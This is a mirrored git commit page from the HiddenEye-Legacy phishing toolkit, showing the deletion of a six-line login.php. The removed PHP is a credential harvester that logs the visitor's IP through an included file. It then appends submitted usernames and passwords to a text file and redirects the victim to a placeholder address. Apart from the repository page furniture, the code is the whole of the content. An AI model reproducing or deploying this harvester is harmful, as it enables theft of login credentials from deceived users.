mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Delete login.php
This commit is contained in:
parent
61cba860fc
commit
67438d5f05
|
@ -1,6 +0,0 @@
|
|||
<?php
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: <CUSTOM>');
|
||||
exit();
|
Loading…
Reference in New Issue
Block a user